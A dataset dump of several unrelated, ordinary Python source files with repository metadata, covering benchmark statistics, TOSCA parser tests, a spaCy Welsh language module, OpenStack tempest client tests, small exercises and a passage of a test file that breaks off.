4865c79548d4f83ebae4e10fbaf4c3ba10535c97
[ "BSD-3-Clause" ]
null
null
null
tools/profiling/microbenchmarks/speedup.py
lalo/grpc
4865c79548d4f83ebae4e10fbaf4c3ba10535c97
[ "BSD-3-Clause" ]
1
2020-11-04T04:19:45.000Z
2020-11-04T04:19:45.000Z
# Copyright 2017, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
from scipy import stats
import math

# Two-sample t-test p-values above this threshold are treated as
# "no significant difference" between the timing samples.
_THRESHOLD = 1e-10


def scale(a, mul):
    """Return a copy of list *a* with every element multiplied by *mul*."""
    return [x * mul for x in a]


def cmp(a, b):
    """Run an independent two-sample t-test on *a* vs *b*.

    Returns the (statistic, p-value) pair from scipy.stats.ttest_ind.
    NOTE: the name shadows the Python 2 builtin ``cmp``; kept unchanged
    for backward compatibility with existing callers.
    """
    return stats.ttest_ind(a, b)


def speedup(new, old):
    """Estimate the percentage speedup of *new* over *old* timing samples.

    Returns 0 when the two samples are not significantly different
    (NaN p-value from degenerate input, zero statistic, or p-value above
    _THRESHOLD). Otherwise, scales *old* by (1 +/- pct/100) until the
    difference stops being significant; the last still-significant pct is
    the answer. Negative means *new* is slower than *old*.
    """
    s0, p0 = cmp(new, old)
    if math.isnan(p0):
        return 0
    if s0 == 0:
        return 0
    if p0 > _THRESHOLD:
        return 0
    if s0 < 0:
        # new is slower: find how far old must shrink to match it
        # (capped at -100%, since old cannot shrink below zero).
        pct = 1
        while pct < 101:
            sp, pp = cmp(new, scale(old, 1 - pct / 100.0))
            if sp > 0:
                break
            if pp > _THRESHOLD:
                break
            pct += 1
        return -(pct - 1)
    else:
        # new is faster: find how far old must grow to match it.
        pct = 1
        while pct < 100000:
            sp, pp = cmp(new, scale(old, 1 + pct / 100.0))
            if sp < 0:
                break
            if pp > _THRESHOLD:
                break
            pct += 1
        return pct - 1


if __name__ == "__main__":
    new = [66034560.0, 126765693.0, 99074674.0, 98588433.0, 96731372.0,
           110179725.0, 103802110.0, 101139800.0, 102357205.0, 99016353.0,
           98840824.0, 99585632.0, 98791720.0, 96171521.0, 95327098.0,
           95629704.0, 98209772.0, 99779411.0, 100182488.0, 98354192.0,
           99644781.0, 98546709.0, 99019176.0, 99543014.0, 99077269.0,
           98046601.0, 99319039.0, 98542572.0, 98886614.0, 72560968.0]
    old = [60423464.0, 71249570.0, 73213089.0, 73200055.0, 72911768.0,
           72347798.0, 72494672.0, 72756976.0, 72116565.0, 71541342.0,
           73442538.0, 74817383.0, 73007780.0, 72499062.0, 72404945.0,
           71843504.0, 73245405.0, 72778304.0, 74004519.0, 73694464.0,
           72919931.0, 72955481.0, 71583857.0, 71350467.0, 71836817.0,
           70064115.0, 70355345.0, 72516202.0, 71716777.0, 71532266.0]
    # Fix: print() calls instead of Python 2 print statements, so the
    # script runs unchanged on both Python 2 and Python 3.
    print(speedup(new, old))
    print(speedup(old, new))
44.205882
372
0.720892
468
3,006
4.602564
0.463675
0.011142
0.012535
0.021356
0.159703
0.126277
0.126277
0.126277
0.126277
0.126277
0
0.240733
0.1833
3,006
67
373
44.865672
0.63666
0.489355
0
0.181818
0
0
0.005312
0
0
0
0
0
0
0
null
null
0
0.060606
null
null
0.060606
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
c115d0dcb588341f74d0f27a5c67b230c70e0776
2,203
py
Python
tests/extensions/aria_extension_tosca/simple_v1_0/functions/test_function_get_operation_output.py
tnadeau/incubator-ariatosca
de32028783969bc980144afa3c91061c7236459c
[ "Apache-2.0" ]
null
null
null
tests/extensions/aria_extension_tosca/simple_v1_0/functions/test_function_get_operation_output.py
tnadeau/incubator-ariatosca
de32028783969bc980144afa3c91061c7236459c
[ "Apache-2.0" ]
null
null
null
tests/extensions/aria_extension_tosca/simple_v1_0/functions/test_function_get_operation_output.py
tnadeau/incubator-ariatosca
de32028783969bc980144afa3c91061c7236459c
[ "Apache-2.0" ]
1
2020-06-16T15:13:06.000Z
2020-06-16T15:13:06.000Z
# -*- coding: utf-8 -*- # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Syntax def test_functions_get_operation_output_syntax_empty(parser): parser.parse_literal(""" tosca_definitions_version: tosca_simple_yaml_1_0 node_types: MyType: properties: my_parameter: type: string topology_template: node_templates: my_node: type: MyType properties: my_parameter: { get_operation_output: [] } # needs at least two args """).assert_failure() # Arguments def test_functions_get_operation_output(parser): parser.parse_literal(""" tosca_definitions_version: tosca_simple_yaml_1_0 interface_types: MyType: my_operation: {} node_types: MyType: properties: my_parameter: type: string interfaces: MyInterface: type: MyType topology_template: node_templates: my_node: type: MyType properties: my_parameter: { get_operation_output: [ my_node, MyInterface, my_operation, my_variable ] } """).assert_success() # Unicode def test_functions_get_operation_output_unicode(parser): parser.parse_literal(""" tosca_definitions_version: tosca_simple_yaml_1_0 interface_types: 類型: 手術: {} node_types: 類型: properties: 參數: type: string interfaces: 接口: type: 類型 topology_template: node_templates: 模板: type: 類型 properties: 參數: { get_operation_output: [ 模板, 接口, 手術, 變量 ] } """).assert_success()
25.917647
99
0.71675
285
2,203
5.308772
0.424561
0.039656
0.071381
0.071381
0.384666
0.384666
0.317251
0.317251
0.256444
0.256444
0
0.006279
0.204721
2,203
84
100
26.22619
0.857306
0.362687
0
0.77193
0
0
0.750903
0.147292
0
0
0
0
0.052632
1
0.052632
false
0
0
0
0.052632
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c118f0b44128ed4108fefd9f2643f8940209777b
1,484
py
Python
cy/old__init__.py
techiaith/anonymeiddiwr-beta
13391fc62674503e1476d057d787456c1cd0f743
[ "MIT" ]
null
null
null
cy/old__init__.py
techiaith/anonymeiddiwr-beta
13391fc62674503e1476d057d787456c1cd0f743
[ "MIT" ]
null
null
null
cy/old__init__.py
techiaith/anonymeiddiwr-beta
13391fc62674503e1476d057d787456c1cd0f743
[ "MIT" ]
null
null
null
# encoding: utf8 from __future__ import unicode_literals, print_function # Gruff #from spacy.lang.cy.lemmatization import lemmatize_doc #from spacy.lang.cy.dictionary_pos_tagger import rule_based_pos_tag from .tokenizer_exceptions import TOKENIZER_EXCEPTIONS from .tag_map import TAG_MAP from .stop_words import STOP_WORDS from .lemmatizer import LOOKUP from .punctuation import TOKENIZER_SUFFIXES from .norm_exceptions import NORM_EXCEPTIONS from .lex_attrs import LEX_ATTRS from ..tokenizer_exceptions import BASE_EXCEPTIONS from ..norm_exceptions import BASE_NORMS from ...language import Language from ...attrs import LANG, NORM from ...util import update_exc, add_lookups #from ...lemmatizerlookup import Lemmatizer #from ...lemmatizer import Lemmatizer class WelshDefaults(Language.Defaults): lex_attr_getters = dict(Language.Defaults.lex_attr_getters) # lex_attr_getters.update(LEX_ATTRS) # Angen vocab? lex_attr_getters[LANG] = lambda text: 'cy' lex_attr_getters[NORM] = add_lookups(Language.Defaults.lex_attr_getters[NORM], BASE_NORMS, NORM_EXCEPTIONS) tokenizer_exceptions = update_exc(BASE_EXCEPTIONS, TOKENIZER_EXCEPTIONS) tag_map = dict(TAG_MAP) stop_words = set(STOP_WORDS) suffixes = tuple(TOKENIZER_SUFFIXES) lemma_lookup = LOOKUP # @classmethod # def create_lemmatizer(cls, nlp=None): # return Lemmatizer(LOOKUP) class Welsh(Language): lang = 'cy' Defaults = WelshDefaults __all__ = ['Welsh']
29.68
82
0.786388
193
1,484
5.735751
0.336788
0.03794
0.075881
0.062331
0.081301
0
0
0
0
0
0
0.000782
0.138814
1,484
49
83
30.285714
0.865415
0.239892
0
0
0
0
0.008065
0
0
0
0
0
0
1
0
false
0
0.481481
0
0.851852
0.037037
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
c11c1101c7284dfff505791ee890d86d4e6ea9a9
54
py
Python
preprocessing/init_buffer.py
GPrathap/OpenBCIPython
0f5be167fb09d31c15885003eeafec8cdc08dbfa
[ "MIT" ]
1
2021-11-07T12:01:08.000Z
2021-11-07T12:01:08.000Z
preprocessing/init_buffer.py
GPrathap/OpenBCIPython
0f5be167fb09d31c15885003eeafec8cdc08dbfa
[ "MIT" ]
null
null
null
preprocessing/init_buffer.py
GPrathap/OpenBCIPython
0f5be167fb09d31c15885003eeafec8cdc08dbfa
[ "MIT" ]
1
2020-10-15T08:35:01.000Z
2020-10-15T08:35:01.000Z
# Module-level shared state for the preprocessing pipeline.

# Ring buffers container; starts empty — presumably one buffer per
# channel, populated elsewhere at runtime (TODO confirm against callers).
ring_buffers = []
# Iteration cap used by consumers of this module — exact semantics not
# visible here; verify against the code that reads it.
max_iteration = 10
# Raw channel data payload, kept as a string until filled in by a producer.
channel_data = ""
18
18
0.722222
7
54
5.142857
1
0
0
0
0
0
0
0
0
0
0
0.043478
0.148148
54
3
19
18
0.73913
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c123379662e2eddb0a1b05c80adcd7fca1847567
193
py
Python
libsheep/state.py
exogen/80sheep
a6da85f6c10c8088e2c86a186c2934e71e8d2d16
[ "MIT" ]
1
2016-05-09T03:32:09.000Z
2016-05-09T03:32:09.000Z
libsheep/state.py
exogen/80sheep
a6da85f6c10c8088e2c86a186c2934e71e8d2d16
[ "MIT" ]
null
null
null
libsheep/state.py
exogen/80sheep
a6da85f6c10c8088e2c86a186c2934e71e8d2d16
[ "MIT" ]
null
null
null
from libsheep.filelist import FileListing


class State(object):
    """Mutable holder for session-wide client state."""

    def __init__(self):
        """Initialize with an empty file listing and unset hub/download info."""
        # Fresh listing wrapping no underlying data yet.
        self.file_list = FileListing(None)
        # Both start unset; populated later by the application
        # (semantics not visible here — confirm against callers).
        self.downloaded_lists = self.hubs = None
24.125
42
0.683938
23
193
5.478261
0.73913
0.126984
0
0
0
0
0
0
0
0
0
0
0.238342
193
7
43
27.571429
0.857143
0
0
0
0
0
0
0
0
0
0
0
0
1
0.166667
false
0
0.166667
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c15a11bff5706bd78f8d5633560270d5f1288958
1,198
py
Python
Data Science With Python/22-network-analysis-in-python-(part-1)/02-important-nodes/07-networkx-betweenness-centrality-on-a-social-network.py
aimanahmedmoin1997/DataCamp
c6a6c4d59b83f14854bd76ed5c0c7f2dddd6de1d
[ "MIT" ]
3
2019-05-12T04:49:24.000Z
2020-05-06T00:40:28.000Z
Data Science With Python/22-network-analysis-in-python-(part-1)/02-important-nodes/07-networkx-betweenness-centrality-on-a-social-network.py
aimanahmedmoin1997/DataCamp
c6a6c4d59b83f14854bd76ed5c0c7f2dddd6de1d
[ "MIT" ]
null
null
null
Data Science With Python/22-network-analysis-in-python-(part-1)/02-important-nodes/07-networkx-betweenness-centrality-on-a-social-network.py
aimanahmedmoin1997/DataCamp
c6a6c4d59b83f14854bd76ed5c0c7f2dddd6de1d
[ "MIT" ]
7
2018-11-06T17:43:31.000Z
2020-11-07T21:08:16.000Z
''' NetworkX betweenness centrality on a social network Betweenness centrality is a node importance metric that uses information about the shortest paths in a network. It is defined as the fraction of all possible shortest paths between any pair of nodes that pass through the node. NetworkX provides the nx.betweenness_centrality(G) function for computing the betweenness centrality of every node in a graph, and it returns a dictionary where the keys are the nodes and the values are their betweenness centrality measures. INSTRUCTIONS 100XP Compute the betweenness centrality bet_cen of the nodes in the graph T. Compute the degree centrality deg_cen of the nodes in the graph T. Compare betweenness centrality to degree centrality by creating a scatterplot of the two, with list(bet_cen.values()) on the x-axis and list(deg_cen.values()) on the y-axis. ''' # Compute the betweenness centrality of T: bet_cen bet_cen = nx.betweenness_centrality(T) # Compute the degree centrality of T: deg_cen deg_cen = nx.degree_centrality(T) # Create a scatter plot of betweenness centrality and degree centrality plt.scatter(list(bet_cen.values()), list(deg_cen.values())) # Display the plot plt.show()
49.916667
241
0.803005
195
1,198
4.866667
0.379487
0.221286
0.075869
0.054795
0.106428
0.05058
0.05058
0.05058
0
0
0
0.002935
0.146912
1,198
24
242
49.916667
0.925636
0.864775
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c15b395be045c74bbf78970ce90b3d9d8a773036
667
py
Python
sktracker/ui/mpl/matplotlib_widget.py
bnoi/scikit-tracker
8771006a3a682ab299e4446c800c05f36a027df7
[ "BSD-3-Clause" ]
6
2016-03-03T12:45:32.000Z
2018-07-06T18:51:46.000Z
sktracker/ui/mpl/matplotlib_widget.py
bnoi/scikit-tracker
8771006a3a682ab299e4446c800c05f36a027df7
[ "BSD-3-Clause" ]
1
2021-05-12T07:54:20.000Z
2021-05-12T07:54:20.000Z
sktracker/ui/mpl/matplotlib_widget.py
bnoi/scikit-tracker
8771006a3a682ab299e4446c800c05f36a027df7
[ "BSD-3-Clause" ]
2
2017-11-27T13:40:43.000Z
2020-12-12T18:31:11.000Z
# -*- coding: utf-8 -*- from __future__ import unicode_literals from __future__ import division from __future__ import absolute_import from __future__ import print_function import matplotlib.pyplot as plt from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas class MatplotlibWidget(FigureCanvas): def __init__(self, figure, parent): """ """ super(MatplotlibWidget, self).__init__(figure) self.setParent(parent) self.fig = figure def close_figure(self): """ """ if self.fig: self.fig.clf() plt.close(self.fig) self.fig = None
23
80
0.656672
72
667
5.680556
0.486111
0.085575
0.156479
0.06846
0
0
0
0
0
0
0
0.004032
0.256372
667
28
81
23.821429
0.820565
0.031484
0
0
0
0
0
0
0
0
0
0
0
1
0.125
false
0
0.375
0
0.5625
0.0625
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
c17c68ae3200877db56dbf358f2554f7b5e93369
630
py
Python
tests/test_key_store.py
brickgao/cos-python-sdk
52d22553e83d0be5c73e8d71a63417e275a32c8e
[ "MIT" ]
null
null
null
tests/test_key_store.py
brickgao/cos-python-sdk
52d22553e83d0be5c73e8d71a63417e275a32c8e
[ "MIT" ]
null
null
null
tests/test_key_store.py
brickgao/cos-python-sdk
52d22553e83d0be5c73e8d71a63417e275a32c8e
[ "MIT" ]
null
null
null
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import os

from contentos_sdk.key_store import KeyStore


def test_key_store():
    """Exercise KeyStore add/get/remove plus dump/load round-trip.

    Fix: the on-disk "dummy" file written by dump_to_file is now removed
    in a finally block, so repeated test runs start from a clean state.
    """
    key_store = KeyStore()
    key_store.add_key("account1", "key1")
    key_store.add_key("account2", "key2")
    assert key_store.get_key("account1") == "key1"
    assert key_store.get_accounts() == ["account1", "account2"]
    key_store.remove_key("account2")
    assert key_store.get_accounts() == ["account1"]
    key_store2 = KeyStore()
    try:
        key_store.dump_to_file("dummy", b"badpasswd")
        key_store2.load_from_file("dummy", b"badpasswd")
        # Round-trip must preserve the account list.
        assert key_store2.get_accounts() == key_store.get_accounts()
    finally:
        # Clean up the temporary artifact even if an assertion fails.
        if os.path.exists("dummy"):
            os.remove("dummy")
30
64
0.693651
86
630
4.755814
0.383721
0.215159
0.107579
0.124694
0.161369
0.161369
0
0
0
0
0
0.027985
0.149206
630
20
65
31.5
0.735075
0.068254
0
0
0
0
0.164103
0
0
0
0
0
0.307692
1
0.076923
false
0.153846
0.076923
0
0.153846
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
c18e05b054dc993ef3dcf4a3fdfe2bf5ac02fbe1
249
py
Python
examples/tutorial/lcu_events.py
TheodorStraube/lcu-driver
892e5695807a0ad27afa411b103a99fd64397f87
[ "MIT" ]
57
2019-06-07T09:35:00.000Z
2022-03-09T06:31:47.000Z
examples/tutorial/lcu_events.py
TheodorStraube/lcu-driver
892e5695807a0ad27afa411b103a99fd64397f87
[ "MIT" ]
11
2020-10-31T02:42:59.000Z
2022-03-18T02:46:33.000Z
examples/tutorial/lcu_events.py
TheodorStraube/lcu-driver
892e5695807a0ad27afa411b103a99fd64397f87
[ "MIT" ]
11
2021-01-07T19:09:09.000Z
2022-03-20T06:54:06.000Z
from lcu_driver import Connector

# Single connector instance; the decorators below register lifecycle hooks
# on it before the event loop starts.
connector = Connector()


@connector.ready
async def connect(connection):
    """Runs when the League Client (LCU) API connection is ready."""
    print('LCU API is ready to be used.')


@connector.close
async def disconnect(connection):
    """Runs when the client connection closes."""
    print('Finished task')


# NOTE: blocking call — starts the connector's event loop, so importing
# this module has side effects.
connector.start()
15.5625
41
0.742972
32
249
5.75
0.65625
0.293478
0.293478
0
0
0
0
0
0
0
0
0
0.156627
249
15
42
16.6
0.87619
0
0
0
0
0
0.164659
0
0
0
0
0
0
1
0
false
0
0.111111
0
0.111111
0.222222
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c1d04f40b1dc8ffd40c7e8d1d706e8daa03e9421
5,600
py
Python
tempest/tests/lib/services/identity/v3/test_protocols_client.py
cityofships/tempest
59aa6811a3664d88b8939603b8e974644fbe21fa
[ "Apache-2.0" ]
254
2015-01-05T19:22:52.000Z
2022-03-29T08:14:54.000Z
tempest/tests/lib/services/identity/v3/test_protocols_client.py
cityofships/tempest
59aa6811a3664d88b8939603b8e974644fbe21fa
[ "Apache-2.0" ]
13
2015-03-02T15:53:04.000Z
2022-02-16T02:28:14.000Z
tempest/tests/lib/services/identity/v3/test_protocols_client.py
cityofships/tempest
59aa6811a3664d88b8939603b8e974644fbe21fa
[ "Apache-2.0" ]
367
2015-01-07T15:05:39.000Z
2022-03-04T09:50:35.000Z
# Copyright 2020 Samsung Electronics Co., Ltd
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.

from tempest.lib.services.identity.v3 import protocols_client
from tempest.tests.lib import fake_auth_provider
from tempest.tests.lib.services import base


class TestProtocolsClient(base.BaseServiceTest):
    """Unit tests for ProtocolsClient (identity v3 OS-FEDERATION protocols).

    Each ``*_with_str_body`` / ``*_with_bytes_body`` pair drives the same
    client call with the mocked REST response delivered as str or bytes.
    """

    # Canned response for the "list protocols" call.
    FAKE_PROTOCOLS_INFO = {
        "links": {
            "next": None,
            "previous": None,
            "self": "http://example.com/identity/v3/OS-FEDERATION/" +
                    "identity_providers/FAKE_ID/protocols"
        },
        "protocols": [
            {
                "id": "fake_id1",
                "links": {
                    "identity_provider": "http://example.com/identity/v3/" +
                                         "OS-FEDERATION/identity_providers/" +
                                         "FAKE_ID",
                    "self": "http://example.com/identity/v3/OS-FEDERATION/"
                            "identity_providers/FAKE_ID/protocols/fake_id1"
                },
                "mapping_id": "fake123"
            }
        ]
    }

    # Canned response for the single-protocol calls (add/get/update).
    FAKE_PROTOCOL_INFO = {
        "protocol": {
            "id": "fake_id1",
            "links": {
                "identity_provider": "http://example.com/identity/v3/OS-" +
                                     "FEDERATION/identity_providers/FAKE_ID",
                "self": "http://example.com/identity/v3/OS-FEDERATION/" +
                        "identity_providers/FAKE_ID/protocols/fake_id1"
            },
            "mapping_id": "fake123"
        }
    }

    def setUp(self):
        super(TestProtocolsClient, self).setUp()
        fake_auth = fake_auth_provider.FakeAuthProvider()
        self.client = protocols_client.ProtocolsClient(
            fake_auth, 'identity', 'regionOne')

    def _test_add_protocol_to_identity_provider(self, bytes_body=False):
        self.check_service_client_function(
            self.client.add_protocol_to_identity_provider,
            'tempest.lib.common.rest_client.RestClient.put',
            self.FAKE_PROTOCOL_INFO,
            bytes_body,
            idp_id="FAKE_ID",
            protocol_id="fake_id1",
            status=201)

    def _test_list_protocols_of_identity_provider(self, bytes_body=False):
        self.check_service_client_function(
            self.client.list_protocols_of_identity_provider,
            'tempest.lib.common.rest_client.RestClient.get',
            self.FAKE_PROTOCOLS_INFO,
            bytes_body,
            idp_id="FAKE_ID",
            status=200)

    def _test_get_protocol_for_identity_provider(self, bytes_body=False):
        self.check_service_client_function(
            self.client.get_protocol_for_identity_provider,
            'tempest.lib.common.rest_client.RestClient.get',
            self.FAKE_PROTOCOL_INFO,
            bytes_body,
            idp_id="FAKE_ID",
            protocol_id="fake_id1",
            status=200)

    def _test_update_mapping_for_identity_provider(self, bytes_body=False):
        self.check_service_client_function(
            self.client.update_mapping_for_identity_provider,
            'tempest.lib.common.rest_client.RestClient.patch',
            self.FAKE_PROTOCOL_INFO,
            bytes_body,
            idp_id="FAKE_ID",
            protocol_id="fake_id1",
            status=200)

    def _test_delete_protocol_from_identity_provider(self, bytes_body=False):
        self.check_service_client_function(
            self.client.delete_protocol_from_identity_provider,
            'tempest.lib.common.rest_client.RestClient.delete',
            {},
            bytes_body,
            idp_id="FAKE_ID",
            protocol_id="fake_id1",
            status=204)

    def test_add_protocol_to_identity_provider_with_str_body(self):
        self._test_add_protocol_to_identity_provider()

    def test_add_protocol_to_identity_provider_with_bytes_body(self):
        self._test_add_protocol_to_identity_provider(bytes_body=True)

    def test_list_protocols_of_identity_provider_with_str_body(self):
        self._test_list_protocols_of_identity_provider()

    def test_list_protocols_of_identity_provider_with_bytes_body(self):
        self._test_list_protocols_of_identity_provider(bytes_body=True)

    def test_get_protocol_for_identity_provider_with_str_body(self):
        self._test_get_protocol_for_identity_provider()

    def test_get_protocol_for_identity_provider_with_bytes_body(self):
        self._test_get_protocol_for_identity_provider(bytes_body=True)

    def test_update_mapping_for_identity_provider_with_str_body(self):
        self._test_update_mapping_for_identity_provider()

    def test_update_mapping_for_identity_provider_with_bytes_body(self):
        self._test_update_mapping_for_identity_provider(bytes_body=True)

    def test_delete_protocol_from_identity_provider_with_str_body(self):
        self._test_delete_protocol_from_identity_provider()

    def test_delete_protocol_from_identity_provider_with_bytes_body(self):
        # Fix: was bytes_body=False, which merely duplicated the
        # _with_str_body case and left the bytes path untested —
        # inconsistent with every other *_with_bytes_body test here.
        self._test_delete_protocol_from_identity_provider(bytes_body=True)
39.716312
79
0.664286
658
5,600
5.226444
0.199088
0.14888
0.066298
0.046525
0.73248
0.712126
0.712126
0.671125
0.530387
0.344868
0
0.010287
0.253571
5,600
140
80
40
0.81244
0.104464
0
0.358491
0
0
0.1722
0.0852
0
0
0
0
0
1
0.150943
false
0
0.028302
0
0.207547
0
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c1d5ac280ecee69b50b2c5f6afb9b90afe4637a6
1,563
py
Python
LintCode/chapter 43/603. Largest Divisible Subset/.ipynb_checkpoints/solution-checkpoint.py
vincent507cpu/Comprehensive-Algorithm-Solution
04e01e49622457f09af2e1133954f043c0c92cb9
[ "MIT" ]
4
2020-06-26T00:45:53.000Z
2021-04-19T12:23:32.000Z
LintCode/chapter 43/603. Largest Divisible Subset/solution.py
vincent507cpu/LeetCode-Comprehensive-Solution
04e01e49622457f09af2e1133954f043c0c92cb9
[ "MIT" ]
null
null
null
LintCode/chapter 43/603. Largest Divisible Subset/solution.py
vincent507cpu/LeetCode-Comprehensive-Solution
04e01e49622457f09af2e1133954f043c0c92cb9
[ "MIT" ]
null
null
null
class Solution:
    # @param {int[]} nums a set of distinct positive integers
    # @return {int[]} the largest subset in which every pair divides evenly
    def largestDivisibleSubset(self, nums):
        """Return the largest subset of *nums* where each pair (a, b)
        satisfies a % b == 0 or b % a == 0, in ascending order.

        Dynamic programming over the sorted values: dp[v] is the length of
        the best divisible chain ending at v, prev[v] its predecessor.
        """
        if not nums:
            # Fix: return an empty list (the original returned the int 0),
            # keeping the return type consistent with the non-empty case.
            return []
        nums = sorted(nums)
        dp, prev = {}, {}
        for num in nums:
            dp[num] = 1
            prev[num] = -1
        last_num = nums[0]
        for num in nums:
            # Extend the best chain among num's proper factors.
            for factor in self.get_factors(num):
                if factor not in dp:
                    continue
                if dp[num] < dp[factor] + 1:
                    dp[num] = dp[factor] + 1
                    prev[num] = factor
            if dp[num] > dp[last_num]:
                last_num = num
        return self.get_path(prev, last_num)

    def get_path(self, prev, last_num):
        """Walk prev-links back from *last_num*; return the chain ascending."""
        path = []
        while last_num != -1:
            path.append(last_num)
            last_num = prev[last_num]
        return path[::-1]

    def get_factors(self, num):
        """Return the proper factors of *num* (excluding num itself;
        1 has none), found by trial division up to sqrt(num)."""
        if num == 1:
            return []
        factor = 1
        factors = []
        while factor * factor <= num:
            if num % factor == 0:
                factors.append(factor)
                # Add the cofactor, avoiding duplicates (perfect squares)
                # and num itself (cofactor of 1).
                if factor * factor != num and factor != 1:
                    factors.append(num // factor)
            factor += 1
        return factors
27.910714
61
0.408829
160
1,563
3.9125
0.26875
0.100639
0.033546
0.038339
0.044728
0
0
0
0
0
0
0.016753
0.503519
1,563
56
62
27.910714
0.789948
0.080614
0
0.052632
0
0
0
0
0
0
0
0.017857
0
1
0.078947
false
0
0
0
0.236842
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
2
c1eccd50c4c0bef0bc236ab007c3bb33cdd0926d
173
py
Python
Exercicios/Desafio013.py
victorhugof94/Python
8b42955634f3ae44bded350ac88396a02b1f6970
[ "MIT" ]
null
null
null
Exercicios/Desafio013.py
victorhugof94/Python
8b42955634f3ae44bded350ac88396a02b1f6970
[ "MIT" ]
null
null
null
Exercicios/Desafio013.py
victorhugof94/Python
8b42955634f3ae44bded350ac88396a02b1f6970
[ "MIT" ]
null
null
null
# Reads a salary from stdin, applies a 15% raise and prints the new value.
# (User-facing strings are intentionally in Portuguese.)
salario = float(input('valor do salario:'))
# New salary = base + 15% of base.
aumento = salario + (salario* (15/100))
print('voce ganhou um aumento de salario seu salario agora é: R${:.2f}'.format(aumento))
43.25
88
0.705202
26
173
4.692308
0.730769
0
0
0
0
0
0
0
0
0
0
0.039735
0.127168
173
3
89
57.666667
0.768212
0
0
0
0
0
0.462428
0
0
0
0
0
0
1
0
false
0
0
0
0
0.333333
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
c1f4bb133035976b48bb331afd3017e6ebbc488d
1,908
py
Python
tests/test_utils.py
bccho/pass-glm
4ad14dd043532419dc413c509672b54d1eb8d516
[ "MIT" ]
null
null
null
tests/test_utils.py
bccho/pass-glm
4ad14dd043532419dc413c509672b54d1eb8d516
[ "MIT" ]
null
null
null
tests/test_utils.py
bccho/pass-glm
4ad14dd043532419dc413c509672b54d1eb8d516
[ "MIT" ]
null
null
null
import os

import numpy.random as npr
from numpy.testing import *
import scipy.sparse as sp

from passglm.utils import *


def test_create_folder_if_not_exist():
    """create_folder_if_not_exist must create the folder and be idempotent."""
    try:
